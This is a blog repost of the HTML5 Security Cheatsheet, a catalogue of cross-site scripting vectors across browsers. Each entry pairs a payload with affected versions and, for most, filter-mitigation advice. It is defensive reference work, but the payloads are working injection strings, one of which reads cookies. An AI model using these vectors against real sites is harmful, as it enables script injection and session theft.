html5sec

2017. 4. 1. 02:27개발/팁

curity CheatsheetWhat your browser does when you look away...

Fork me on GitHub

  • Vectors making use of HTML5 features

    XSS via formaction - requiring user interaction (1)#1test

    A vector displaying the HTML5 form and formaction capabilities for form hijacking outside the actual form.

    <form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>

    Don't allow users to submit markup containing "form" and "formaction" attributes or transform them to bogus attributes. Avoid "id" attributes for forms as well as submit buttons.

      • Firefox 4.0
      • Firefox Latest
      • Opera 10.5
      • Opera Latest
      • Chrome 10.0
      • Chrome Latest
      • Safari 4.0.4
      • Safari Latest
      • Internet Explorer 10
      • Internet Explorer Latest (Inside Form Element)
    • xss
    • html5
    • opera
    • chrome
    • firefox
    • formaction
    • javascript
    • button
    .mario

    Self-executing focus event via autofocus#7test

    This vector uses an input element with autofocus to call its own focus event handler - no user interaction required

    <input onfocus=write(1) autofocus>

    User submitted markup should not contain "autofocus" attributes.

      • Firefox 4.0
      • Firefox Latest
      • Opera 9.0
      • Opera Latest
      • Safari 4.0
      • Safari Latest
      • Chrome 4.0
      • Chrome Latest
      • Internet Explorer 10.0
      • Internet Explorer Latest
    • xss
    • autofocus
    • chrome
    • opera
    Gareth

    Self-executing blur event via autofocus competition#8test

    Here we have two HTML input elements competing for the focus - and one executing JavaScript on losing its focus

    <input onblur=write(1) autofocus><input autofocus>

    User submitted markup should not contain "autofocus" attributes.

      • Safari 4.0
      • Safari Latest
      • Chrome 4.0
      • Chrome Latest
    • xss
    • autofocus
    • blur
    • chrome
    • safari
    .mario

    JavaScript execution via <VIDEO> poster attribute#10test

    Opera 10.5+ allows using poster attributes in combination with javascript: URIs. This bug has been fixed in Opera 11.

    <video poster=javascript:alert(1)//></video>

    Make sure only relative URIs, http URIs and correctly MIME-typed data URIs can be used for VIDEO poster attributes

      • Opera 10.5
      • Opera 11.01
    • xss
    • poster
    • video
    • opera
    • html5
      .mario

      Self-executing JavaScript via <BODY> onscroll autofocus#12test

      This vector triggers an onscroll event executing JavaScript on <BODY> due to an autofocus on an <INPUT> way further down the page.

      <body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>

        • Firefox 4.0
        • Firefox Latest
        • Opera 9.0
        • Opera Latest
        • Safari 4.0
        • Safari Latest
        • Chrome 4.0
        • Chrome Latest
      • xss
      • autofocus
      • scroll
      • chrome
      • opera
      .mario

      Form surveillance with onformchange, onforminput and form attributes#23test

      Enter a value into the form element to see how "onforminput" and "onformchange" attributes can monitor <FORM> activity - even from outside the <FORM> via the form attribute on a <BUTTON> element.

      <form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>

      Make sure users cannot submit markup including the form, "onformchange" and "onforminput" attributes. Do not apply <FORM> elements with an "id" attribute.

        • Opera 10.5
        • Opera 12.0
      • surveillance
      • javascript
      • opera
      • html5
      • onforminput
      • onformchange
      Skyphire, .mario

      JavaScript execution via <VIDEO> and <SOURCE> tag (1)#55test

      Opera 10.5+ and Chrome allow error handlers in <SOURCE> tags if encapsulated by a <VIDEO> tag. The same works for <AUDIO> tags

      <video><source onerror="alert(1)">

      Make sure user submitted <SOURCE> tags cannot contain event handlers or whitelist event handlers necessary for UI controls.

        • Opera 10.5
        • Opera Latest
        • Chrome 4.0
        • Chrome Latest
        • Firefox 4.0
        • Firefox Latest
      • xss
      • javascript
      • video
      • source
      • html5
      • opera
      • chrome
      • audio
        .mario

        JavaScript execution via <VIDEO> and <SOURCE> tag (2)#56test

        Firefox 3.5+ allows error handlers in <VIDEO> tags when applied with a <SOURCE> tag. The same works for <AUDIO> tags. On Firefox 4+ the <SOURCE> tag is irrelevant to trigger the error event. This happens because of the implicit "src" attribute in <VIDEO> tag when the page has a number sign (#) in the URL.

        <video onerror="alert(1)"><source></source></video>

        Make sure user submitted <AUDIO> and <VIDEO> tags cannot contain event handlers or whitelist event handlers necessary for UI controls.

          • Firefox 3.5
          • Firefox Latest
          • Internet Explorer 9.0
          • Internet Explorer Latest
        • xss
        • javascript
        • video
        • source
        • html5
        • firefox
        • audio
          .mario

          XSS via formaction - requiring user interaction (2)#72test

          A vector displaying the HTML5 "formaction" capabilities for form hijacking. Note that this variation does not use the "id" and "form" attributes to connect button and form.

          <form><button formaction="javascript:alert(1)">X</button>

          Don't allow users to submit markup containing "form" and "formaction" attributes or transform them to bogus attributes.

            • Firefox 4.0
            • Firefox Latest
            • Opera 10.5
            • Opera Latest
            • Chrome 10.0
            • Chrome Latest
            • Safari 4.0.4
            • Safari Latest
            • Internet Explorer 10.0
            • Internet Explorer Latest
          • xss
          • html5
          • opera
          • formaction
          • javascript
          • button
          .mario

          Passive JavaScript execution via <BODY> and oninput attribute#86test

          All browsers besides Internet Explorer 9↓ support the "oninput" event handler around form elements like the given <INPUT>. The event works for the form elements itself, the surrounding form and <BODY> as well as <HTML> tags.

          <body oninput=alert(1)><input autofocus>

          Do not whitelist "oninput" attributes in user submitted markup.

            • Firefox 3.6
            • Firefox Latest
            • Safari 4.0
            • Safari Latest
            • Chrome 4.0
            • Chrome Latest
            • Opera 9.0
            • Opera Latest
            • Internet Explorer 10.0
            • Internet Explorer Latest
          • xss
          • javascript
          • html5
          • oninput
          • form
          • passive
          • event
            Skyphire

            Passive JavaScript execution via MathML on Firefox#130test

            Modern Firefox versions allow usage of inline MathML. While other user agents don't support the href attribute for MathML elements (yet), Firefox does and thereby enables passive JavaScript execution. Note that supporting href for MathML elements is a feature - introduced with MathML 3. The same effect can be observed by using xlink:href. The statusline action further enables obfuscation of the actual link target - and in this example hides the JavaScript URI.

            <math href="javascript:alert(1)">CLICKME</math> <math> <!-- up to FF 13 --> <maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction> <!-- FF 14+ --> <maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction> </math>

            Do not allow users to submit unfiltered MathML content.

              • Firefox 6
              • Firefox Latest
            • mathml
            • xss
            • inline
            • firefox
            .mario, LeverOne

            Transparent overwriting of request-data using HTML5 "dirname" attributes#136test

            Opera and Chrome support the HTML5 attribute "dirname", that can be used to have the browser communicate the text-flow direction of another input element by adding it to the server-sent request body. By injecting a "dirname" attribute in an existing form, an attacker can overwrite user input and thereby make it guessable for malicious purposes. The overwritten value would then be "ltr" or "rtl" - depending on the actual text-flow direction. The "dirname" attribute is not yet supported by Internet Explorer or Firefox.

            <form action="" method="post"> <input name="username" value="admin" /> <input name="password" type="password" value="secret" /> <input name="injected" value="injected" dirname="password" /> <input type="submit"> </form>

            Avoid white-listing the "dirname" attribute in user generated content. The effects on existing forms are hard to predict and might cause privacy problems and information leaks.

              • Opera 12.0
              • Chrome 22.0
              • Chrome Latest
            • html5
            • dirname
            • privacy
            • http
            • form
            • infoleak
            .mario

            Executing JavaScript via cross-origin HTML imports#138test

            Google Chrome Canary already supports HTML Imports. They allow to fetch resources from arbitrary origins (as long as the Access-Control-Origin headers are set properly) and inject it into the requesting DOM. Currently, only Chrome supports the feature and it's still hidden behind a flag. It is however to be expected to be supported by all major browsers.

            <link rel="import" href="test.svg" />

            Make sure that HTML imports are limited to the same origin. Avoid permitting users to have <link> tags in user-generated rich-text as they can now directly execute JavaScript without any user interaction.

              • Chrome 33.0
              • Chrome Latest
              • Opera Latest
            • html5
            • imports
            • link
            • rel
            • xss
            • active
            .mario

            Executing JavaScript via "srcdoc" attribute in Iframes#139test

            HTML5 specifies a "srcdoc" attribute for Iframes. This attribute, quite similar to data URIs, is capable of hosting HTML text to be rendered by the browser as the content of the Iframe. The pseudo-document created by the "srcdoc" attribute has full access to the hosting domain, although it runs in an artificial origin. This attribute should if at all only be used in combination with the Iframe Sandbox.

            <iframe srcdoc="&lt;img src&equals;x:x onerror&equals;alert&lpar;1&rpar;&gt;" />

            Make sure to use "srcdoc" only in combination with the Iframe Sandbox. Otherwise, XSS attacks might slip through existing filters' rules as the payload can be HTML encoded.

              • Firefox 26.0
              • Firefox Latest
              • Chrome 20.0
              • Chrome Latest
              • Opera 15.0
              • Opera Latest
            • html5
            • iframe
            • sandbox
            • srcdoc
            • xss
            • active
            • entities
            .mario

            HTML5 <picture> element and "srcset" attributes#142test

            HTML5 offers the <picture> element for responsive and accessible images. The <picture> element essentially wraps <source> and <img> elements and provides a way to offer alternative content. Novel here is that the "srcset" attribute allows to trigger load events. This is likely to bypass existing WAF systems.

            <picture><source srcset="x"><img onerror="alert(1)"></picture> <picture><img srcset="x" onerror="alert(1)"></picture> <img srcset=",,,,,x" onerror="alert(1)">

            In case a black-list based XSS filter is in use, make sure that the combination of event handler and "srcset" attribute is detected by it as well.

              • Chrome 38.0
              • Chrome Latest
              • Internet Explorer Spartan
            • picture
            • srcset
            • html5
            • accessibility
            .mario

            Bypassing window.opener protection of rel="noreferrer"#143test

            In many situations, a developer might want to mitigate tab-nabbing attacks that are using window.opener and its writable location object. To do so, it is recommended to apply external links with a rel="noreferrer" attribute. Depending on how the external links are embedded, the protection might however fail - and window.opener might not be null but still be exposed. The problem here is, that rel attributes only work for <a> and <area>. Links and link-like navigation features can however be embedded in multiple other ways. Further note, that MSIE pretty much ignores the standard and doesn't destroy window.opener without further effort.

            <a href="//evil.com" target="_blank" rel="noreferrer">CLICK</a> // window.opener will be null <map><area href="//evil.com" target="_blank" rel="noreferrer">CLICK</area></map> // window.opener will be null <svg><a xlink:href="//evil.com" rel="noreferrer">CLICK</a></svg> // window.opener still works <form action="//evil.com" target="_blank" rel="noreferrer"><input type="submit"></form>// window.opener still works <form id="test" rel="noreferrer"></form><button form="test" formtarget="_blank" formaction="//evil.com">CLICKME</button>// window.opener still works <math href="//evil.com" xlink:show="new" rel="noreferrer">CLICKME</math>// window.opener still works

            Do not rely on the noreferrer attribute value alone, but rather use a dedicated de-referrer page that in additon deactivates window.opener using window.opener.__proto__=null.

              • Chrome 4.0
              • Chrome Latest
              • Opera 9.0
              • Opera Latest
              • Internet Explorer 6.0
              • Internet Explorer Latest
              • Firefox 1.X
              • Firefox Latest
              • Safari 4.0
              • Safari Latest
            • referrer
            • opener
            • html5
            • location
            • tabnabbing
            .mario

            Generating greater-than with HTML5 Named Character References#144test

            Some of the HTML5 Named Character references generate two ASCII characters, such as &nvlt; and &nvgt;. This can in some exotic scenarios be abused to generate valid HTML without actually closing a tag with an ASCII greater-than. The entity will produce the greater-than so we do not have to.

            <iframe srcdoc="<svg onload=alert(1)&nvgt;"></iframe> <a href="javascript:&apos;<svg onload&equals;alert&lpar;1&rpar;&nvgt;&apos;">CLICK</a>

            Be very careful when HTML attributes are used to carry HTML data that is later being used on the website. When entities are accepted, some HTML entities can produce dangerous characters even if they don't look like it on first sight.

              • Chrome 4.0
              • Chrome Latest
              • Opera 12.0
              • Opera Latest
              • Internet Explorer 9.0
              • Internet Explorer Latest
              • Firefox 4.X
              • Firefox Latest
              • Safari 4.0
              • Safari Latest
            • entity
            • character reference
            • html5
            • iframe
            .mario

            XSS without User Interaction from passive Elements#145test

            Often, an attacker can only inject into a "passive" element, meaning for instance a DIV or a SPAN. For those elements, it's not always trivial to execute injected JavaScript without user interaction (such as clicks or mouse events). If the element injected into is outside the visible range, it becomes hard to prove that the injection is in fact exploitable. For this reason, this item lists all currently known ways of executing JavaScript without user interaction from passive elements. The list is expected to grow over time. Note, that for some of the attacks here, the string "#xss" needs to be appended to the URL of the injected page.

            #Chrome, Opera, Safari and Edge <div onfocus="alert(1)" contenteditable tabindex="0" id="xss"></div> <div style="-webkit-user-modify:read-write" onfocus="alert(1)" id="xss"> <div style="-webkit-user-modify:read-write-plaintext-only" onfocus="alert(1)" id="xss"> # Firefox <div onbeforescriptexecute="alert(1)"></div> <script>1</script> #MSIE10/11 & Edge <div style="-ms-scroll-limit:1px;overflow:scroll;width:1px" onscroll="alert(1)"> #MSIE10 <div contenteditable onresize="alert(1)"></div> # MSIE11 <div onactivate="alert(1)" id="xss" style="overflow:scroll"></div> <div onfocus="alert(1)" id="xss" style="display:table"> <div id="xss" style="-ms-block-progression:bt" onfocus="alert(1)"> <div id="xss" style="-ms-layout-flow:vertical-ideographic" onfocus="alert(1)"> <div id="xss" style="float:left" onfocus="alert(1)"> # Chrome, Opera, Safari <style>@keyframes x{}</style> <div style="animation-name:x" onanimationstart="alert(1)"></div> # Chrome, Opera, Safari <style> div {width: 100px;} div:target {width: 200px;} </style> <div id="xss" onwebkittransitionend="alert(1)" style="-webkit-transition: width .1s;"></div> # Safari <div style="overflow:-webkit-marquee" onscroll="alert(1)"></div>

            Most modern browsers provide ways to execute JavaScript from passive elements by combining several aspects an attacker can control. Seemingly passive XSS should thus be treated with similar severity than active XSS.

              • Chrome 4.0
              • Chrome Latest
              • Opera 12.0
              • Opera Latest
              • Internet Explorer 9.0
              • Internet Explorer Latest
              • Firefox 4.X
              • Firefox Latest
              • Safari 4.0
              • Safari Latest
            • user interaction
            • passive elements
            • html5
            • css
            • contenteditable
            .mario, Ben Hayak, avlidienbrunn, Masato Kinugawa

            JavaScript execution via <DETAILS> and ontoggle#147test

            The <DETAILS> element fires an "ontoggle" event without user interaction on modern Blink-based browsers. This can be abused to bypass blacklists as the event-tag combination is not very well known.

            <details open ontoggle="alert(1)">

            Be sure to work with whitelists when allowing users to submit markup - else experimental tags like <DETAILS> might be forgotten to filter and escape.

              • Chrome 24.0
              • Chrome Latest
              • Opera 16.0
              • Opera Latest
            • details
            • ontoggle
            • html5
            • user interaction
              tsetnep, Psych0tr1a

              JavaScript execution via <VIDEO> with empty source and rate change events#148test

              The <VIDEO> element fires an "onratechange" event without user interaction on Firefox, even if no actual value for the "src" attribute is given. This can be used to bypass WAF and IDS systems as this combination of tag and attributes is rather uncommon and unknown.

              <video src onratechange="alert(1)">

              Be sure to work with whitelists when allowing users to submit markup - else tags like <VIDEO> might be forgotten to filter and escape.

                • Firefox 15.0
                • Firefox Latest
              • video
              • onratechange
              • html5
              • user interaction
              • src
                Qab
              • Vectors working on HTML4 and older versions

                JavaScript execution via <FRAMESET> and onload#31test

                This classic vector shows that several tags don't need a "src" attribute to fire onload events, such as <IFRAME>, <BODY> and <FRAMESET>.

                <frameset onload=alert(1)>

                Be sure to work with whitelists when allowing users to submit markup - else ancient tags like <FRAMESET> might be forgotten to filter and escape.

                  • Internet Explorer 5.0
                  • Internet Explorer Latest
                  • Opera 8.X
                  • Opera Latest
                  • Firefox 1.X
                  • Firefox Latest
                  • Chrome 3.0
                  • Chrome Latest
                  • Safari 3.0
                  • Safari Latest
                • xss
                • javascript
                • frames
                • classic
                • html
                • onload
                  .mario

                  JavaScript execution via <TABLE> and background#32test

                  Opera 8-10.5+ as well as Internet Explorer 6 support JavaScript URIs for <TABLE> and some other tags' "background" attributes. This causes JavaScript execution without user interaction. The problem has been fixed in Opera 11.

                  <table background="javascript:alert(1)"></table>

                  In case evil attributes like event handlers are being filtered from user submitted markup make sure not to forget "background" - among others.

                    • Internet Explorer 6.0
                    • Opera 8.X
                    • Opera 11.01
                  • xss
                  • javascript
                  • background
                  • classic
                  • html
                  • table
                    .mario

                    HTML comment parsing issues (1)#37test

                    This vector shows how comments are being parsed and what problems can arise in case user submitted HTML is allowed to contain comments.

                    <!--<img src="--><img src=x onerror=alert(1)//">

                    Make sure comments are not allowed in user submitted html. The markup should be checked for security issues after comments have been stripped out - not before.

                      • Internet Explorer 5.0
                      • Internet Explorer Latest
                      • Opera 8.0
                      • Opera Latest
                      • Firefox 1.0
                      • Firefox Latest
                      • Chrome 3.0
                      • Chrome Latest
                      • Safari 3.0
                      • Safari Latest
                    • xss
                    • javascript
                    • comment
                    • parsing
                    • attributes
                      sirdarckcat, .mario

                      HTML comment parsing issues (2)#38test

                      Besides <!---> the Internet Explorer allows to use <COMMENT> tags. The vector shows how comments are being parsed and what problems can arise in case user submitted HTML is allowed to contain comments. This example works up to IE 8 standards mode.

                      <comment><img src="</comment><img src=x onerror=alert(1)//">

                      Make sure <COMMENT> tags are not allowed in user submitted html. The markup should be checked for security issues after <COMMENT> tags have been stripped out or escaped - not before.

                        • Internet Explorer 5.0
                        • Internet Explorer Latest (In Older Docmode)
                      • xss
                      • javascript
                      • comment
                      • parsing
                      • attributes
                        .mario

                        CDATA section parsing issues#39test

                        Firefox and Opera allow using CDATA section delimiters in HTML - in the stripped form "<![" as well as including padding like "<![CDATA[". This can cause problems for filter mechanisms since those delimiters can be used for massive obfuscation. Firefox 4 and Opera 11.60 have fixed the issue. However, modern browsers have a separate XML parsers for inline SVG or MathML, which allow to use the CDATA sections (including a little irregular shape).

                        <!-- up to Opera 11.52, FF 3.6.28 --> <![><img src="]><img src=x onerror=alert(1)//"> <!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+ --> <svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>

                        Make sure CDATA delimiters are not allowed in user submitted html. The markup should be checked for security issues after CDATA sections nd delimiters have been stripped out or escaped - not before.

                          • Opera 8.0
                          • Opera Latest
                          • Firefox 1.X
                          • Firefox Latest
                          • Internet Explorer 9.0
                          • Internet Explorer Latest
                          • Chrome 7.0
                          • Chrome Latest
                          • Safari 4.0.4
                          • Safari Latest
                        • xss
                        • javascript
                        • cdata
                        • parsing
                        • attributes
                        • math
                        • svg
                        • inline
                          LeverOne

                          Plaintext tags used for markup obfuscation#40test

                          This vector works on all tested user agents and shows how several filtering solutions can be tricked into accepting malicious HTML. A badly written filter will assume the error handler is part of the first image's "src" attribute and accept the incoming data.

                          <style><img src="</style><img src=x onerror=alert(1)//">

                          Don't rely on weak regular express for markup filtering. Use whitelists for allowed tags and rely on a filter solution based on a heavily tested tokenizer/parser.

                            • Internet Explorer 5.0
                            • Internet Explorer Latest
                            • Opera 8.X
                            • Opera Latest
                            • Firefox 1.X
                            • Firefox Latest
                            • Chrome 3.0
                            • Chrome Latest
                            • Safari 3.0
                            • Safari Latest
                          • xss
                          • javascript
                          • plaintext
                          • tags
                          • parsing
                          • attributes
                            LeverOne

                            Error handler via empty list-style and load handler via empty content#41test

                            Opera 10.5+ and earlier versions fire an error event for <LI> tags in case the background URL via style attribute cannot be loaded. The same works with "list-style-image" too. On Opera 10.10 and earlier more tag/style combinations like background:url() and background-image:url() work as well. Also works combination like content:url(svg), but at the moment it is sensitive to events and <script> tags before and after.

                            <li style=list-style:url() onerror=alert(1)></li> <div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>

                              • Opera 8.0
                              • Opera 12.0
                            • xss
                            • javascript
                            • css
                            • background
                            • opera
                            • onerror
                            • content
                              LeverOne, .mario

                              Link hijacking via <BASE> and JavaScript URI#42test

                              <BASE> link hijacking with JavaScript URIs works on Internet Explorer, Opera (O8-10.5 in case the link URL starts with #) and Safari. User interaction is required to execute the JavaScript. The vector sometimes has to be changed slightly to work for all mentioned user agents. Opera 11 ships a more or less working fix, but this problem continues to exist in difficult to exploit forms though.

                              <head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body>

                              User submitted HTML should not allow usage of <BASE> tags. In case they are necessary no non-HTTP/non-relative URL schemes should be allowed.

                                • Opera 8.X
                                • Opera 10.63
                                • Safari 3.0
                                • Safari 5.1.7
                                • Internet Explorer 5.5
                                • Internet Explorer 8.0
                              • xss
                              • javascript
                              • opera
                              • internet explorer
                              • base
                              • hijacking
                                brainpillow, Gareth, .mario

                                JavaScript execution via <SCRIPT> for and event attributes#48test

                                Internet Explorer allow using <SCRIPT> tags with "for" and "event" attributes to bind event data to specific html elements. The two shown attribute values cause script execution without user interaction. Opera simply ignores these attributes.

                                <SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>

                                  • Opera 10.0
                                  • Opera 12.0
                                  • Internet Explorer 6.0
                                  • Internet Explorer Latest (In Older Docmodes)
                                • xss
                                • javascript
                                • opera
                                • for
                                • event
                                • internet explorer
                                  .mario

                                  JavaScript execution via <OBJECT> DataURL attribute#49test

                                  Internet Explorer 9 and - in some situations - earlier versions support the use of JavaScript URIs for the "dataurl" attribute of a TDC Object. The JavaScript will be executed without user any interaction.

                                  <OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>

                                    • Internet Explorer 6.0
                                    • Internet Explorer 9.0
                                  • xss
                                  • javascript
                                  • internet explorer
                                  • object
                                  • dataurl
                                  • TDC
                                  .mario

                                  JavaScript execution via <OBJECT> data#50test

                                  Almost all browsers supporting data URIs allow executing JavaScript via crafted <OBJECT> "data" attribute value - even if base64 encoded. Note however, that different browsers execute the JavaScript on different origins. Firefox for instance will execute on the hosting domain and thus allow XSS, while Chrome will execute on about:blank.

                                  <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>

                                  Make sure user submitted HTML cannot contain <OBJECT> tags or only whitelisted <OBJECT> "data" values.

                                    • Opera 8.X
                                    • Opera Latest
                                    • Firefox 1.X
                                    • Firefox Latest
                                    • Chrome 3.0
                                    • Chrome Latest
                                    • Safari 4.0
                                    • Safari Latest
                                  • xss
                                  • javascript
                                  • opera
                                  • chrome
                                  • embed
                                  • safari
                                  • src
                                  • firefox
                                  • base64
                                    .mario

                                    JavaScript execution via <EMBED> src#51test

                                    Almost all browsers supporting data URIs allow executing JavaScript via crafted <EMBED> "src" attribute value - even if base64 dencoded. Only Firefox attempts to search for a plugin handler and fails.

                                    <embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></embed> <embed src="javascript:alert(1)"></embed> // Firefox only

                                    Make sure user submitted HTML cannot contain <EMBED> tags or only whitelisted <EMBED> "src" values.

                                      • Opera 8.X
                                      • Opera Latest
                                      • Chrome 3.0
                                      • Chrome Latest
                                      • Safari 4.0
                                      • Safari Latest
                                      • Firefox 12.0
                                      • Firefox Latest
                                    • xss
                                    • javascript
                                    • opera
                                    • chrome
                                    • embed
                                    • safari
                                    • src
                                    • base64
                                      .mario

                                      Tags nested in other tags to trick filters#57test

                                      Chrome, Firefox and Safari will execute JavaScript with this example nesting - while Opera and IE wouldn't.

                                      <b <script>alert(1)//</script>0</script></b>

                                      This vector is ideal to trick regular expression based HTML filters and sanitizers. Make sure your filters are aware of the fact that some user agents evaluate <b <script> while others will prefer <b><script>.

                                        • Firefox 3.5
                                        • Firefox 3.6.28
                                        • Chrome 4.0
                                        • Chrome 5.0
                                        • Safari 3.0
                                        • Safari 4.0.3
                                      • xss
                                      • javascript
                                      • nesting
                                      • script
                                      • parser
                                      • regex
                                        .mario, Kyo, sirdarckcat

                                        XSS using accent grave when copying innerHTML (1)#59test

                                        Internet Explorer treats the accent grave (`) as an attribute delimiter like " and '. The quotation mark (") will be stripped from the attribute value when using the innerHTML property in case it doesn't contain space.

                                        <div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>

                                        Make sure the HTML filter you use is aware of the fact that the accent grave is a valid attribute delimiter for IE too - especially if users are allowed to post harmless JavaScript (JSReg, Google Caja). Be very careful when handling user generated HTMl in the DOM later on. The innerHTML property does not always contain what it's supposed to.

                                          • Internet Explorer 6.0
                                          • Internet Explorer 8.0 (Unpatched)
                                        • xss
                                        • javascript
                                        • internet explorer
                                        • script
                                        • dom
                                        • innerhtml
                                        hasegawayosuke

                                        Simulating attributes in IE#62test

                                        This vector simulates an attribute in IE by using a single quote to trick filters. This works up to IE9 in standards mode and in latest IE using older document modes.

                                        <!-- IE 6-8 --> <x '="foo"><x foo='><img src=x onerror=alert(1)//'> <!-- IE 6-9 --> <! '="foo"><x foo='><img src=x onerror=alert(2)//'> <? '="foo"><x foo='><img src=x onerror=alert(3)//'>

                                          • Internet Explorer 6.0
                                          • Internet Explorer Latest (In Older Docmodes)
                                        • xss
                                        • javascript
                                        • attribute
                                        • simulating
                                        • parser
                                        • regex
                                        Algol, jackmasa, LeverOne, White Jordan

                                        JavaScript execution via src attribute#63test

                                        Most browsers allow executing JavaScript via <IFRAME> "src" attributes - this is expected behavior. Interesting is though that this can be extended to other tags too. Opera 10, Chrome and Firefox execute JavaScript by using the <EMBED> tag while Opera 10 and Opera Mobile even execute JavaScript with <SCRIPT>, <IMG> and <IMAGE> and a matching "src" attribute as well as early Internet Explorer versions.

                                        <embed src="javascript:alert(1)"></embed> // O10.10↓, OM10.0↓, GC6↓, FF <img src="javascript:alert(2)"> <image src="javascript:alert(2)"> // IE6, O10.10↓, OM10.0↓ <script src="javascript:alert(3)"></script> // IE6, O11.01↓, OM10.1↓

                                        Make sure "src" attributes can never contain non-HTTP-URLs to prevent XSS or worse.

                                          • Firefox 3.0
                                          • Firefox Latest
                                          • Chrome 4.0
                                          • Chrome 6.0
                                          • Opera 8.X
                                          • Opera 11.01
                                          • Internet Explorer 6.0
                                        • xss
                                        • javascript
                                        • src
                                        • safari
                                        • chrome
                                        • opera
                                        • firefox
                                        • internet explorer
                                          .mario

                                          JavaScript execution via IE filters and onfilterchange#70test

                                          In some situations it's possible to trigger a filterchange event by using just one filter as the example shows. Also the short filter notation is being used which is supported by all IE versions despite the information in the documentation. In compatibility mode to IE8+ you can use the property "-ms-filter".

                                          <div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>

                                            • Internet Explorer 6.0
                                            • Internet Explorer 9.0
                                          • xss
                                          • javascript
                                          • filter
                                          • css
                                          • style
                                          • onfilterchange
                                          • internet explorer
                                          .mario

                                          <OBJECT> tag and Flash files executing JavaScript#79test

                                          <OBJECT> tags directly including Flash files via the "data" attribute - allowing execution of JavaScript and more without user interaction.

                                          <object allowscriptaccess="always" data="test.swf"></object>

                                          Make sure users cannot control the "src" and "data" attribute values of <OBJECT> tags - or better don't whitelist <OBJECT> tags in user submitted markup at all.

                                          class XSS {public static function main() { flash.Lib.getURL(new flash.net.URLRequest(flash.Lib._root.url||"javascript:alert(1)"),flash.Lib._root.name||"_top"); }}crossdomain: 1path: http://html5sec.org/test.swfname: test.swf
                                            • Safari 3.0
                                            • Safari Latest
                                            • Firefox 1.5
                                            • Firefox Latest
                                            • Opera 10.0
                                            • Opera 12.0
                                            • Internet Explorer 6.0
                                            • Internet Explorer Latest
                                          • xss
                                          • javascript
                                          • object
                                          • flash
                                          • swf
                                          • safari
                                          • firefox
                                          • opera
                                          .mario

                                          Special tags parsing issues#91test

                                          The HTML tagnames start with a-zA-Z (abstracting from ignoring null byte from IE). In addition, there are other structures, parsed as a tag (special tags). They begin with the following characters: !,?, /,%. This has its reasons: DTD, comments, xml-declaration, import-instruction in Internet Explorer, closing tags etc. starts by these characters. These examples show that such tags will inherit some properties of their standard models. [A] Firefox, Opera, Google Chrome, Safari (4.0.4↑), IE 10↑ Standards mode: Parameters of the special tags can not contain a closing parenthesis ">". [B] Safari (up to 4.0.3): Parameter of the special tags can be broken only via "?>". [C] Opera (up to 11.52): Special tag inherits the properties of DTD: inside it you can create a section that starts with "[" and ends with "]". [D] IE 9↓ Standards mode, Safari (up to 4.0.3): A sequence like "<% ... %>" is an alternative to comments. These features can be used for obfuscation and bypassing filters. And remember, do not parse as a tag in HTML structure like "<È foo=...>".

                                          [A] <? foo="><script>alert(1)</script>"> <! foo="><script>alert(1)</script>"> </ foo="><script>alert(1)</script>"> [B] <? foo="><x foo='?><script>alert(1)</script>'>"> [C] <! foo="[[[x]]"><x foo="]foo><script>alert(1)</script>"> [D] <% foo><x foo="%><script>alert(1)</script>">

                                            • Internet Explorer 5.0
                                            • Internet Explorer Latest
                                            • Opera 8.X
                                            • Opera Latest
                                            • Firefox 1.X
                                            • Firefox Latest
                                            • Chrome 3.0
                                            • Chrome Latest
                                            • Safari 3.0
                                            • Safari Latest
                                          • xss
                                          • tagname
                                          • internet explorer
                                          • opera
                                          • firefox
                                          • chrome
                                          • safari
                                          • parsing
                                          • breaking
                                          • obfuscation
                                          • closing tag
                                          LeverOne, wpulog

                                          JavaScript execution via MHTML-scheme#96test

                                          This example used the ability to convert the file with any conent type into a web archive using mhtml URI scheme to run JavaScript. For the first time this feature was discovered by Stepanishchev E. in 2006 and became known among web developers as an alternative to data URI for IE6-7. In 2007, Hasegawa Y. independently proposed a way to use this mhtml feature for XSS. Followed fix was incomplete because it doesn't take into account the possibility of addressing to the contents of the archive using "!value". This possibility as well as the possibility to access from the archive contents to a host domain are used in the example below. Using this vector all sites that do not contain two new lines in the source code and allows users to insert new line were vulnerable - as well as all sites that allow users to upload images without post-upload conversion etc. A link to this web archives could be specified via <IFRAME> or location.href and comparable. This example was published in June 2010, fix released in April 2011. The mhtml URI scheme doesn't determine the content type now, but archive contents still has access to the host domain.

                                          <iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe> <iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>

                                          <html> <body> <b>some content without two new line \n\n</b> Content-Type: multipart/related; boundary="******"<b>some content without two new line</b> --****** Content-Location: xss.html Content-Transfer-Encoding: base64 PGlmcmFtZSBuYW1lPWxvIHN0eWxlPWRpc3BsYXk6bm9uZT48L2lmcmFtZT4NCjxzY3JpcHQ+DQp1 cmw9bG9jYXRpb24uaHJlZjtkb2N1bWVudC5nZXRFbGVtZW50c0J5TmFtZSgnbG8nKVswXS5zcmM9 dXJsLnN1YnN0cmluZyg2LHVybC5pbmRleE9mKCcvJywxNSkpO3NldFRpbWVvdXQoImFsZXJ0KGZy YW1lc1snbG8nXS5kb2N1bWVudC5jb29raWUpIiwyMDAwKTsNCjwvc2NyaXB0PiAgICAg --******-- </body> </html>crossdomain: 1path: http://html5sec.org/test.htmlname: test.html
                                            • Internet Explorer 5.0
                                            • Internet Explorer 10.0
                                          • xss
                                          • internet explorer
                                          • archive
